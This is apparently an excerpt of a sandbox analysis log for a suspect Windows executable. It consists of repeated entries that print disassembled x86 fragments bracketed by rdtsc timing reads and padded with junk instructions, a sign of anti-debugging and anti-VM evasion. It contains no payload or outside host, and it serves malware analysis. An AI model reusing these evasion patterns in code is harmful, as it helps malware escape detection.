Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1134410 second address: 113441A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAF8FC5086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113441A second address: 1134420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1136526 second address: 113652C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1134420 second address: 1134438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FAAF9128034h 0x0000000f pushad 0x00000010 je 00007FAAF9128026h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11382E1 second address: 11382E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11382E5 second address: 11382F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11365F5 second address: 11365FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11382F2 second address: 11382F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1134536 second address: 1134540 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1134540 second address: 1134544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113F5DE second address: 113F5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113F5E6 second address: 113F5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113F5EC second address: 113F5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113F5F1 second address: 113F608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FAAF9128026h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d ja 00007FAAF9128026h 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113F608 second address: 113F60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113F60E second address: 113F622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jns 00007FAAF9128026h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113F622 second address: 113F628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113F628 second address: 113F63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113F63A second address: 113F640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1146CAF second address: 1146CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAAF912802Ch 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1146CC4 second address: 1146CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 jmp 00007FAAF8FC508Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FAAF8FC5090h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1146CEE second address: 1146CF4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10D356C second address: 10D3570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10D3570 second address: 10D35AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128038h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jmp 00007FAAF9128031h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 js 00007FAAF9128026h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1146416 second address: 1146420 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAF8FC5092h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 114658B second address: 1146594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1146594 second address: 114659C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 114659C second address: 11465C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FAAF912802Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAF9128034h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1146861 second address: 114686D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FAAF8FC5086h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10DBA90 second address: 10DBA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAAF9128026h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10DBA9C second address: 10DBAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10DBAA0 second address: 10DBAA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10DBAA9 second address: 10DBAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10DBAB3 second address: 10DBACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jmp 00007FAAF912802Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FAAF9128026h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1150622 second address: 1150640 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAAF8FC5086h 0x00000008 jmp 00007FAAF8FC5094h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1150640 second address: 1150645 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1150F35 second address: 1150F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAAF8FC5086h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1150F41 second address: 1150F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1150F4C second address: 1150F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5090h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11511BA second address: 11511C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAF9128026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11511C4 second address: 11511CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FAAF8FC5086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11511CE second address: 11511D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11511D2 second address: 1151205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAF8FC5094h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAAF8FC5091h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1151205 second address: 1151209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1151209 second address: 1151223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5096h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11517CD second address: 11517D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11517D4 second address: 11517E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAAF8FC5086h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11517E0 second address: 11517EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11570BD second address: 11570C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11570C1 second address: 11570E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007FAAF9128026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAAF9128037h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11570E4 second address: 11570F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FAAF8FC508Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11570F4 second address: 1157100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1157100 second address: 115710C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115710C second address: 1157110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1155E51 second address: 1155E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1155E56 second address: 1155E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FAAF9128026h 0x00000009 jns 00007FAAF9128026h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edi 0x00000013 jmp 00007FAAF9128031h 0x00000018 pop edi 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1155E82 second address: 1155E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1155FCA second address: 1155FDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1155FDD second address: 1155FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF8FC508Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1155FEE second address: 1155FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1155B06 second address: 1155B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push edx 0x00000008 jmp 00007FAAF8FC508Ah 0x0000000d pop edx 0x0000000e pop edi 0x0000000f jc 00007FAAF8FC509Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1156B2E second address: 1156B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1156B34 second address: 1156B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1159D5B second address: 1159D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1159D6A second address: 1159D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1159D70 second address: 1159D7A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAF912802Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1159D7A second address: 1159D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jno 00007FAAF8FC5086h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1159D88 second address: 1159D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E169 second address: 115E172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E172 second address: 115E176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E176 second address: 115E187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1121C39 second address: 1121C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1121C40 second address: 1121C88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5090h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D23F0h], edx 0x00000012 lea eax, dword ptr [ebp+1248DA19h] 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FAAF8FC5088h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 pop esi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1121C88 second address: 1121C8E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1121C8E second address: 10FDF33 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAAF8FC5094h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FAAF8FC5088h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007FAAF8FC5095h 0x0000002c sbb edi, 3B2FE62Ch 0x00000032 call dword ptr [ebp+122D17C2h] 0x00000038 jo 00007FAAF8FC509Ch 0x0000003e push esi 0x0000003f jmp 00007FAAF8FC5092h 0x00000044 pushad 0x00000045 popad 0x00000046 pop esi 0x00000047 push eax 0x00000048 pushad 0x00000049 jmp 00007FAAF8FC5094h 0x0000004e pushad 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1121EA1 second address: 1121EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 112210A second address: 1122110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122333 second address: 112235F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jo 00007FAAF9128038h 0x00000012 jc 00007FAAF912802Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11223BD second address: 11223E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FAAF8FC5086h 0x00000009 jmp 00007FAAF8FC508Eh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jg 00007FAAF8FC5094h 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11223E2 second address: 1122413 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAAF9128026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b jmp 00007FAAF9128039h 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jns 00007FAAF9128026h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122539 second address: 112253F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 112253F second address: 1122544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122544 second address: 1122552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122552 second address: 1122556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122556 second address: 112256D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FAAF8FC5088h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ecx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 112256D second address: 112259F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jmp 00007FAAF912802Dh 0x0000000e pushad 0x0000000f jmp 00007FAAF912802Ah 0x00000014 jg 00007FAAF9128026h 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 112259F second address: 11225AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAAF8FC5086h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122671 second address: 1122699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FAAF9128033h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jnl 00007FAAF9128028h 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122E73 second address: 1122E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
